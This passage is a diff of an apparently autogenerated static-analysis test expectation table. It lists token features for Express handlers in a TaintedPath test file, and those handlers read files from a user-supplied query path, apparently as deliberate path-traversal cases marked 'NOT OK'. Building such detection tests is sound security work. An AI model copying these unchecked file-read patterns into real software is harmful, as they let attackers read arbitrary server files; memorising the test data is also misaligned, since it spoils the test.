readFileSync path /index.html pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:63:19:63:22 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:63:19:63:22 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:63:19:63:22 | path | stringConcatenatedWith | -endpoint- '/index.html' | | autogenerated/TaintedPath/normalizedPaths.js:63:19:63:38 | path + "/index.html" | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:63:19:63:38 | path + "/index.html" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:63:19:63:38 | path + "/index.html" | calleeImports | fs | @@ -7810,6 +71036,67 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:63:19:63:38 | path + "/index.html" | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:63:19:63:38 | path + "/index.html" | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:63:19:63:38 | path + "/index.html" | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:63:26:63:38 | "/index.html" | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:63:26:63:38 | "/index.html" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:63:26:63:38 | "/index.html" | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:63:26:63:38 | "/index.html" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:63:26:63:38 | "/index.html" | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:63:26:63:38 | "/index.html" | stringConcatenatedWith | path -endpoint- | +| autogenerated/TaintedPath/normalizedPaths.js:65:7:65:34 | !pathMo ... e(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:65:7:65:34 | !pathMo ... e(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:65:7:65:34 | !pathMo ... e(path) | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:65:7:65:34 | !pathMo ... e(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:65:7:65:34 | !pathMo ... e(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:65:8:65:17 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:65:8:65:17 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:65:8:65:17 | pathModule | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:65:8:65:17 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:65:8:65:17 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:65:8:65:28 | pathMod ... bsolute | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:65:8:65:28 | pathMod ... bsolute | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:65:8:65:28 | pathMod ... bsolute | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:65:8:65:28 | pathMod ... bsolute | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:65:8:65:28 | pathMod ... bsolute | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:65:8:65:34 | exceptional return of pathMod ... e(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:65:8:65:34 | exceptional return of pathMod ... e(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:65:8:65:34 | exceptional return of pathMod ... e(path) | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:65:8:65:34 | exceptional return of pathMod ... e(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:65:8:65:34 | exceptional return of pathMod ... e(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:65:8:65:34 | pathMod ... e(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:65:8:65:34 | pathMod ... e(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:65:8:65:34 | pathMod ... e(path) | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:65:8:65:34 | pathMod ... e(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:65:8:65:34 | pathMod ... e(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:65:19:65:28 | isAbsolute | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:65:19:65:28 | isAbsolute | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:65:19:65:28 | isAbsolute | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:65:19:65:28 | isAbsolute | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:65:19:65:28 | isAbsolute | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:66:5:66:6 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:66:5:66:6 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:66:5:66:6 | fs | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:66:5:66:6 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:66:5:66:6 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:66:5:66:19 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:66:5:66:19 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:66:5:66:19 | fs.readFileSync | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:66:5:66:19 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:66:5:66:19 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:66:5:66:25 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:66:5:66:25 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:66:5:66:25 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:66:5:66:25 | exceptional return of fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:66:5:66:25 | exceptional return of fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:66:5:66:25 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:66:5:66:25 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:66:5:66:25 | fs.read ... c(path) | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:66:5:66:25 | fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:66:5:66:25 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:66:8:66:19 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:66:8:66:19 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:66:8:66:19 | readFileSync | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:66:8:66:19 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:66:8:66:19 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:66:21:66:24 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:66:21:66:24 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:66:21:66:24 | path | calleeImports | fs | @@ -7819,6 +71106,31 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:66:21:66:24 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:66:21:66:24 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:66:21:66:24 | path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:68:5:68:6 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:68:5:68:6 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:68:5:68:6 | fs | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:68:5:68:6 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:68:5:68:6 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:68:5:68:19 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:68:5:68:19 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:68:5:68:19 | fs.readFileSync | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:68:5:68:19 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:68:5:68:19 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:68:5:68:25 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:68:5:68:25 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:68:5:68:25 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:68:5:68:25 | exceptional return of fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:68:5:68:25 | exceptional return of fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:68:5:68:25 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:68:5:68:25 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:68:5:68:25 | fs.read ... c(path) | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:68:5:68:25 | fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:68:5:68:25 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:68:8:68:19 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:68:8:68:19 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:68:8:68:19 | readFileSync | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:68:8:68:19 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:68:8:68:19 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:68:21:68:24 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:68:21:68:24 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:68:21:68:24 | path | calleeImports | fs | @@ -7828,6 +71140,21 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:68:21:68:24 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:68:21:68:24 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:68:21:68:24 | path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:71:1:71:3 | app | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:71:1:71:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:71:1:71:3 | app | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:71:1:71:7 | app.get | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:71:1:71:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:71:1:71:7 | app.get | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:71:1:79:2 | app.get ... T OK\\n}) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:71:1:79:2 | app.get ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:71:1:79:2 | app.get ... T OK\\n}) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:71:1:79:2 | exceptional return of app.get ... T OK\\n}) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:71:1:79:2 | exceptional return of app.get ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:71:1:79:2 | exceptional return of app.get ... T OK\\n}) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:71:5:71:7 | get | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:71:5:71:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:71:5:71:7 | get | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:71:9:71:28 | '/prepend-normalize' | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/normalizedPaths.js:71:9:71:28 | '/prepend-normalize' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:71:9:71:28 | '/prepend-normalize' | calleeImports | express | @@ -7835,6 +71162,21 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:71:9:71:28 | '/prepend-normalize' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/normalizedPaths.js:71:9:71:28 | '/prepend-normalize' | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:71:9:71:28 | '/prepend-normalize' | receiverName | app | +| autogenerated/TaintedPath/normalizedPaths.js:71:31:71:30 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:71:31:71:30 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:71:31:71:30 | fs | enclosingFunctionBody | req res path pathModule normalize ./ req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:71:31:71:30 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:71:31:71:30 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:71:31:71:30 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:71:31:71:30 | pathModule | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:71:31:71:30 | pathModule | enclosingFunctionBody | req res path pathModule normalize ./ req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:71:31:71:30 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:71:31:71:30 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:71:31:79:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:71:31:79:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:71:31:79:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res path pathModule normalize ./ req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:71:31:79:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:71:31:79:1 | 'arguments' object of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:71:31:79:1 | (req, r ... OT OK\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/normalizedPaths.js:71:31:79:1 | (req, r ... OT OK\\n} | InputArgumentIndex | 1 | | autogenerated/TaintedPath/normalizedPaths.js:71:31:79:1 | (req, r ... OT OK\\n} | calleeImports | express | @@ -7842,11 +71184,77 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:71:31:79:1 | (req, r ... OT OK\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/normalizedPaths.js:71:31:79:1 | (req, r ... OT OK\\n} | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:71:31:79:1 | (req, r ... OT OK\\n} | receiverName | app | +| autogenerated/TaintedPath/normalizedPaths.js:71:31:79:1 | exceptional return of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:71:31:79:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:71:31:79:1 | exceptional return of anonymous function | enclosingFunctionBody | req res path pathModule normalize ./ req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:71:31:79:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:71:31:79:1 | exceptional return of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:71:31:79:1 | return of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:71:31:79:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:71:31:79:1 | return of anonymous function | enclosingFunctionBody | req res path pathModule normalize ./ req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:71:31:79:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:71:31:79:1 | return of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:71:32:71:34 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:71:32:71:34 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:71:32:71:34 | req | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:71:32:71:34 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:71:32:71:34 | req | enclosingFunctionBody | req res path pathModule normalize ./ req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:71:32:71:34 | req | enclosingFunctionBody | req res path pathModule normalize ./ req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:71:32:71:34 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:71:32:71:34 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:71:32:71:34 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:71:32:71:34 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:71:37:71:39 | res | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:71:37:71:39 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:71:37:71:39 | res | enclosingFunctionBody | req res path pathModule normalize ./ req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:71:37:71:39 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:71:37:71:39 | res | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:73:7:73:10 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:73:7:73:10 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:73:7:73:10 | path | enclosingFunctionBody | req res path pathModule normalize ./ req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:73:7:73:10 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:73:7:73:10 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:73:7:73:56 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:73:7:73:56 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:73:7:73:56 | path | enclosingFunctionBody | req res path pathModule normalize ./ req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:73:7:73:56 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:73:7:73:56 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:73:7:73:56 | path = ... y.path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:73:7:73:56 | path = ... y.path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:73:7:73:56 | path = ... y.path) | enclosingFunctionBody | req res path pathModule normalize ./ req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:73:7:73:56 | path = ... y.path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:73:7:73:56 | path = ... y.path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:73:14:73:23 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:73:14:73:23 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:73:14:73:23 | pathModule | enclosingFunctionBody | req res path pathModule normalize ./ req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:73:14:73:23 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:73:14:73:23 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:73:14:73:33 | pathModule.normalize | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:73:14:73:33 | pathModule.normalize | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:73:14:73:33 | pathModule.normalize | enclosingFunctionBody | req res path pathModule normalize ./ req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:73:14:73:33 | pathModule.normalize | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:73:14:73:33 | pathModule.normalize | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:73:14:73:56 | exceptional return of pathMod ... y.path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:73:14:73:56 | exceptional return of pathMod ... y.path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:73:14:73:56 | exceptional return of pathMod ... y.path) | enclosingFunctionBody | req res path pathModule normalize ./ req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:73:14:73:56 | exceptional return of pathMod ... y.path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:73:14:73:56 | exceptional return of pathMod ... y.path) | fileImports | express 